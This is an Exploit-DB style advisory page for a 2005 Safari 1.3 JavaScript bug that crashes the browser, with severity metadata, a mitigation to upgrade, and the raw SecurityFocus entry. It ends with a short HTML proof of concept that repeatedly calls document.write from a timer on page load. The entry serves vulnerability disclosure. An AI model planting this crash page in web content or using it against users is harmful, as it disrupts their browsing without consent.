Apple Safari Web Browser JavaScript Vulnerability

vendor:

Safari Web Browser

by:

SecurityFocus

7.5

CVSS

HIGH

Browser Crash

119

CWE

Product Name: Safari Web Browser

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:apple:safari

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Apple Safari Web Browser JavaScript Vulnerability

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations. The exact cause of this issue is currently unknown. This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception.

Mitigation:

Upgrade to the latest version of Safari Web Browser

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14528/info

Apple Safari Web Browser is prone to a vulnerability that may result in a browser crash. This issue is exposed when the browser performs certain JavaScript operations.

The exact cause of this issue is currently unknown. This BID will be updated as further information is disclosed.

This vulnerability allows remote attackers to crash affected Web browsers by causing an invalid memory access exception.

Safari version 1.3 is reported susceptible to this issue. Other versions may also be affected. 

<html>
<script name="JavaScript">
<!--

function tickTock()
{
setTimeout("tickTock()", 1000);
thisTime = new Date()
seconds = thisTime.getSeconds()
document.write(seconds);
}

// -->
</script>

<body onLoad="tickTock();">
</html>